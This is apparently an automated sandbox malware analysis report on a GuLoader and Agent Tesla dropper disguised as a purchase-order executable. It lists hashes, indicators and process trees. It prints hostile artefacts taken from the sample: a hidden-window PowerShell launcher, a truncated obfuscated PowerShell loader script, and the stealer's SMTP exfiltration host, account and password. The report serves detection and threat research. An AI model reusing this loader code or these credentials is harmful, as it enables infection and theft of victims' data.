Malware analysis PO#800019DOCS.exe Malicious activity

Add for printing

File name:	PO#800019DOCS.exe
Full analysis:	https://app.any.run/tasks/5451a794-b00e-4790-90da-93ae9c50cea9
Verdict:	Malicious activity
Threats:	Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. Agent Tesla ist eine Spyware, die Informationen über die Aktionen ihrer Opfer sammelt, indem sie Tastatureingaben und Benutzerinteraktionen aufzeichnet. Sie wird auf der speziellen Website, auf der diese Malware verkauft wird, fälschlicherweise als legitime Software vermarktet. GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. GuLoader ist ein fortschrittlicher, in Shellcode geschriebener Downloader. Er wird von Kriminellen verwendet, um andere Malware, vor allem Trojaner, in großem Umfang zu verbreiten. Er ist dafür berüchtigt, dass er Anti-Erkennungs- und Anti-Analyse-Funktionen nutzt. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	December 19, 2023, 13:51:08
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	guloader loader trojan agenttesla stealer
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5:	52B60AA09D7F769D7ADF9B04E5E4850D
SHA1:	5076F3A1A9162D41E7D9DA2042F6329637F264EA
SHA256:	11D9509F622E499B362C84F0CDDF882DA541A0F86636B051ADE4A8F2D916CB09
SSDEEP:	98304:UDdDLBptQ9z9L3CruwwD1100pg5FTrsE1W5wSFS1w0T0AZWH0O7k0Q8slfXeMquu:kMci

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.177.11)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (64-bit x64) (7.5.1)
PowerShell 7-x64 (7.2.11.0)
Skype version 8.100 (8.100)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Run PowerShell with an invisible window
  - powershell.exe (PID: 2600)
- GULOADER has been detected (SURICATA)
  - powershell.exe (PID: 3024)
- AGENTTESLA has been detected (YARA)
  - powershell.exe (PID: 3024)
SUSPICIOUS
- Starts POWERSHELL.EXE for commands execution
  - PO#800019DOCS.exe (PID: 2712)
  - powershell.exe (PID: 2600)
- Application launched itself
  - powershell.exe (PID: 2600)
- Reads the Internet Settings
  - powershell.exe (PID: 3024)
- Unusual connection from system programs
  - powershell.exe (PID: 3024)
- Base64-obfuscated command line is found
  - powershell.exe (PID: 2600)
- The Powershell connects to the Internet
  - powershell.exe (PID: 3024)
INFO
- Reads the computer name
  - PO#800019DOCS.exe (PID: 2712)
- Creates files in the program directory
  - PO#800019DOCS.exe (PID: 2712)
- Creates files or folders in the user directory
  - PO#800019DOCS.exe (PID: 2712)
- Checks supported languages
  - PO#800019DOCS.exe (PID: 2712)
- Checks proxy server information
  - powershell.exe (PID: 3024)
- Creates or changes the value of an item property via Powershell
  - powershell.exe (PID: 2600)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

AgentTesla

(PID) Process(3024) powershell.exe

Protocolsmtp

Hostserver1.sqsendy.shop

Port587

Usernamesenderfinance@longyarh.shop

PasswordpFyOcUbm;4KH

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win32 Executable MS Visual C++ (generic) (42.2)
.exe	\|	Win64 Executable (generic) (37.3)
.dll	\|	Win32 Dynamic Link Library (generic) (8.8)
.exe	\|	Win32 Executable (generic) (6)
.exe	\|	Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2016:12:11 22:50:55+01:00
ImageFileCharacteristics:	No relocs, Executable, No line numbers, No symbols, 32-bit
PEType:	PE32
LinkerVersion:	6
CodeSize:	26112
InitializedDataSize:	186368
UninitializedDataSize:	2048
EntryPoint:	0x3334
OSVersion:	4
ImageVersion:	6
SubsystemVersion:	4
Subsystem:	Windows GUI
FileVersionNumber:	1.5.0.0
ProductVersionNumber:	1.5.0.0
FileFlagsMask:	0x0000
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	English (U.S.)
CharacterSet:	Windows, Latin1
Comments:	melismatics
CompanyName:	pachyvaginitis
FileDescription:	sammenkrbnes
FileVersion:	1.5.0.0
LegalCopyright:	kberen
LegalTrademarks:	afstivningsbjlkens categorises cupen

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

388

"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=powershell.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

C:\Program Files\Internet Explorer\iexplore.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Internet Explorer

Exit code:

Version:

11.00.9600.16428 (winblue_gdr.131013-1700)

Modules

Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll

1524

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:388 CREDAT:267521 /prefetch:2

C:\Program Files (x86)\Internet Explorer\iexplore.exe

iexplore.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

LOW

Description:

Internet Explorer

Exit code:

Version:

11.00.9600.16428 (winblue_gdr.131013-1700)

Modules

Images
c:\program files (x86)\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2600

powershell.exe -windowstyle hidden $d = Get-Content 'C:\Users\admin\AppData\Roaming\postureteral\boblekammer\Livslbskurve\Beslutningstagningers\Skifteprotokollers\Plactgr.Unc' ; powershell.exe ''$d''

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

—

PO#800019DOCS.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2712

"C:\Users\admin\AppData\Local\Temp\PO#800019DOCS.exe"

C:\Users\admin\AppData\Local\Temp\PO#800019DOCS.exe

—

explorer.exe

User:

admin

Company:

pachyvaginitis

Integrity Level:

MEDIUM

Description:

sammenkrbnes

Exit code:

Version:

1.5.0.0

Modules

Images
c:\users\admin\appdata\local\temp\po#800019docs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

3024

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Uerkendeligt Faithfulnesses Pyrostilpnite Scenite Iolites #><#Svinglamper Gemination Garnisonsbyers #><#Excuser Pyromanbrande Taffelurenes Tvindegarnets Rebuffable Hjtidelighedernes #><#Workwoman Typegodkender Fissicostate Rvestregers Phecda #><#Gehngenes Rhombi Ondine Abonnementskrise Falbalas Zippiest #><#Rods Remonteringernes Alulim bortrejsende Restriven #><#Parisienne Viceborgmestrene hengaaedes Nonremittably Lsagtigst terrakottavasers Scyllaroid #><#Totterers Nosise Sekstur Veneklap Nonexhibitionistic vickys #><#Tilforordnedes Formrke Hallopodous #><#Decarbonizes Decimalvrdier Trusserederens Unrhythmically #><#Somerville Unagitatedly Aromatiserendes Energibundt Dinumeration Firepersonersvognenes #><#Inexpungibility Anchusine Romanbladsstil Withwind Vedgaa Ptyalolithiasis #><#Cockalan Coggle Vekselrytterne #><#Untastable Stereoplasma Pistil Reemersion Wifes Pneumatocardia Forureningsskaderne #><#Ombygger Aberroscope Pareringer Anticovenanting Kiksene #><#Diaphragming Slurp Vindruer #><#Humoristiskes Panderly Subdeterminant Gtevi Billedgalleriers #><#Drtrinnenes Beatniks Ormegaardens Allegoriseres Tffelhelt Ferskvandsomraader Bloknfr #><#Adtranz forhandlerrabatter Afgiftsbelbets #><#Phonophoric Subeditorial Dybfryseres Antiknocks Giveaways Koldbrands #>$Hookonto = """Sk;SvF Du FnAwcAdtKoiFoo KnLu GrBOrrEkaAncSmtHjeapd U0Fd4 J Br{Aa Be Ch S CpSuaFrrInaarmse(Va[BaStatcur wiLunovgMa] O`$StGKoeExr TmRoaRanLenUneEksSpsvu)Il; L St Fo pe An`$PslPeuDasFot SlFeyCh Li=Ov SpN AechwOv-KrOEtbMaj TeOpcBatUn HebhayDetMeePu[Af]Hs Cu(Sk`$BlGtieUnr RmReaFnnNenSceEfsZosAs.BuLFoeWonTegdutOrh D L/Fe A2Dy)Ud;si O N ca SFCloSurTo( S`$BaLCuiSpvJas BkBivToaByl WiMitane At NeLorPrsEk=Ti0ci;Sk Bj`$DiLUniduvVisVikMivInaUnlShiRht CeEntSkeMur ZsCh N-Sal PtAn F`$TrGAbe QrComGoaEynPunKoeKasOpsAm.StL AeSonUngMdt Oh e;Co S`$BoL LiNovUnsLokDovPraKrlPriDotVee DtSaeCyrRasFo+st=Ny2Ve)Ar{ B Ex I u Ta Vi Ma N Sm`$EplSeuIbsRetPrlMoyOv[ov`$NyLDuiLavMasStkBevEmaOulPaiPetSteggt SeDorPisNy/Be2Fu]Un Ls=No Do[StcSpoUdnFrvDeeUnr PtRe]Fa:Bl:SkTOso OBCryMotSke A(De`$ShGKoe FrfemMoaren Hn KePesDisAf. FSFeu SbMesVetKarPriStnUngLa(Ca`$ChLVaiDovApsKnkSuvCeaMalOviCotHieOptpeeTrrers L,Fo Me2 U)Mo,Ga Da1 L6Ai) F;Pu Rr Ai`$exl AuEas CtPllVuyGl[Pa`$FaLAfiBevgss TkStvDya UlBiiNetAreDetDeeLerCosTo/Hy2Bl]Sh kl=Ga DiMFeaStrOuk TeUntRea AbPeiSalKaiTatSly P5Tv Ab`$Inl PucasBntStlCayAm[Le`$ ILAiiUlvHasSukSkvUnaKnlSeiDitRae FtDeeGarDusBu/Bl2Ca]Re C1 K2Jo7Sv;Re Fj Te B In} P Pl[SkSSttImrBaiHanGegIn]An[fuSCryAfsRetFieCrmAn.UbTLee SxSttMi.PrEFlnUncAwoSodNai PnUlgGr]St:Na: SABrSAnCFrIHeIMo.ReGSueRatSuS ft MruniWhn RgRe(de`$PilQuu FscatAnl NyMi)Dd;Ua}Un`$DoTDdvTieVahafuFonSedRe0Be=TeBUnr UaKlcFot pe Rdsi0 T4Tr L' T2 UCCa0Ta6Al0 NCDe0 PBBa1CoAVi1Ou2 E5 a1ch1RiBpr1 S3Po1 M3Ce'Se; D`$egTUdvSueUnhVeuFonskd t1 P= UB Sr RaArcUdtSkedad D0Su4af h'Sa3Pu2Id1Ma6Dr1FoC P0SnDPu1Ov0Be0SeCGr1Op0As1Ju9Ya0 UBDi5 L1 P2Ul8Am1Bo6An1Ka1Ep4PjCRa4MiDCh5 M1Bs2StASt1To1Do0EdC m1blE J1Sy9Br1ByAPi3Ku1Co1 EEOv0 MB D1Su6No0Un9 D1ErABr3de2Re1meALe0 JBDr1Vi7Im1Ma0De1tiBLi0SaCfo'Fo;Ek`$FoTMuvDre ShTiuTenTadsl2Ce=RvBLurGraTrc OtRoeStdFi0 L4Re De'Al3re8 D1 RAUd0OvBCh2 UFPr0OvDFy1An0 P1BaC M3CaE y1SaBTo1EzBin0inD E1 MAIn0 PCTi0ReCSt' A;Do`$ STByvEseNyhFoukunSadMy3Me= HBKorWiaKvcRetSceUndSu0Ap4Py F'Un2ZeC b0 I6gr0TrCRe0 bBJu1AlASa1De2Ho5 G1Mi2AnDEx0PlAdi1Pa1Fo0RuBAp1Ve6Li1Sl2 H1 MAMi5Mu1Ch3El6Mo1St1Id0ReBUd1BuARe0LaDKa1So0Fr0TiFFu2LeCVe1OrALa0PoD C0Zo9Te1Le6 A1RoCKe1 CA R0GsCVi5Pa1Gr3Tr7Sh1MiEBr1Bi1Ly1 SBga1Ma3Gh1DeAsu2CrDWi1 KA G1 S9Am'Co;Ov`$HeTRiv LeInhPru MnPldAm4Ka=OvBByrNia rc Mt feImdUn0Th4Te Ed'He0 OCCa0TrBEl0ChDRe1 B6Xy1Bo1Un1 A8Re'Am;Ci`$BoTBev ReNehDeu SnpedSv5 L=CeB PrKya Tc FtEdeInd o0 P4Tr Fo'Fo3Fe8La1AsA K0HyBBe3De2Et1Ge0Co1SkBSp0PrA t1Sj3Un1AsAdi3Ge7St1EcEVa1Pr1St1 SBSu1Fo3Hu1UrASt'Ak; A`$NoTInvCoehehInuranBodFr6 E=LyBFrr caClcMetBee CdPe0 I4Rd Mi'St2 TDOv2StBMa2MaC P0unFPh1AnAFo1ChCSn1To6Ub1baESe1Ef3 B3Te1Pr1FoESp1Im2Fd1MeAKy5 J3cr5GrFUn3Da7Ru1 A6Ha1 MBCo1 SAbo3 IDSt0 O6Im2PrCFj1Af6Fo1Fo8 C5Ea3 W5InFSt2BuFOm0EpADe1KaD S1Pu3Pa1Se6Er1PaC I'Co; S`$FoTSevIme ChMou InHudGa7ha=BrB 